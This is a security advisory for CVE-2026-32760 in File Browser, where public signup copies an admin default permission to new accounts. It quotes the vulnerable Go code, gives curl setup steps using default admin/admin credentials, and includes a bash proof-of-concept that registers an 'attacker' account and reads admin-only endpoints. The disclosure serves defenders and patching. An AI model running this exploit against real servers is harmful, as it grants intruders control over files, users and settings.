CVE-2026-32760
Summary
Any unauthenticated visitor can register a full administrator account when self-registration (signup = true) is enabled and the default user permissions have perm.admin = true. The signup handler blindly applies all default settings - including Perm.Admin - to the
new user without any server-side guard that strips admin from self-registered accounts.
Details
Affected file: http/auth.go
Vulnerable code:
// signupHandler (http/auth.go)
user := &users.User{
Username: info.Username,
}
d.settings.Defaults.Apply(user) // ← copies Perm.Admin = true if set in defaults
// NO guard: user.Perm.Admin is never cleared heresettings.UserDefaults.Apply (settings/defaults.go):
func (d *UserDefaults) Apply(u *users.User) {
u.Perm = d.Perm // copies full Permissions struct, including Admin field
...
}Settings API permits Admin in defaults (http/settings.go):
var settingsPutHandler = withAdmin(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
...
d.settings.Defaults = req.Defaults // Admin can set Defaults.Perm.Admin = true
...
})The signupHandler is supposed to create unprivileged accounts for new visitors. It contains no explicit user.Perm.Admin = false reset after Defaults.Apply. If an administrator (intentionally or accidentally) configures defaults.perm.admin = true and also enables signup, every account created via the public registration endpoint is an administrator with full control over all files, users, and server settings.
Demo Server Setup
## Pull latest release
docker run -d --name fb-test \
-p 8080:80 \
-v /tmp/fb-data:/srv \
filebrowser/filebrowser:v2.31.2
## Wait for startup, then set defaults.perm.admin = true
ADMIN_TOKEN=$(curl -s -X POST http://localhost:8080/api/login \
-H 'Content-Type: application/json' \
-d '{"username":"admin","password":"admin"}')
## Enable signup and set admin as default permission
curl -s -X PUT http://localhost:8080/api/settings \
-H "X-Auth: $ADMIN_TOKEN" \
-H 'Content-Type: application/json' \
-d '{
"signup": true,
"defaults": {
"perm": {
"admin": true,
"execute": true,
"create": true,
"rename": true,
"modify": true,
"delete": true,
"share": true,
"download": true
}
}
}'PoC Exploit
#!/bin/bash
## poc_signup_admin.sh
## Demonstrates: unauthenticated signup → admin account
TARGET="http://localhost:8080"
echo "[*] Registering attacker account via public signup endpoint..."
STATUS=$(curl -s -o /dev/null -w "%{http_code}" \
-X POST "$TARGET/api/signup" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Signup response: HTTP $STATUS"
echo "[*] Logging in as newly created account..."
ATTACKER_TOKEN=$(curl -s -X POST "$TARGET/api/login" \
-H "Content-Type: application/json" \
-d '{"username":"attacker","password":"Attack3r!pass"}')
echo "[*] Fetching user list with attacker token (admin-only endpoint)..."
curl -s "$TARGET/api/users" \
-H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.tool
echo ""
echo "[*] Verifying admin access by reading /api/settings..."
curl -s "$TARGET/api/settings" \
-H "X-Auth: $ATTACKER_TOKEN" | python3 -m json.toolExpected output: The attacker's token successfully returns the full user list and
server settings - endpoints restricted to Perm.Admin = true users.
Impact
Any unauthenticated visitor who can reach POST /api/signup obtains a full admin account.
From there, they can:
- List, read, modify, and delete every file on the server
- Create, modify, and delete all other users
- Change authentication method and server settings
- Execute arbitrary commands if
enableExec = true
Package Versions Affected
Automatically patch vulnerabilities without upgrading
CVSS Version
Related Resources
References
https://github.com/filebrowser/filebrowser/security/advisories/GHSA-5gg9-5g7w-hm73, https://github.com/filebrowser/filebrowser
Basic Information
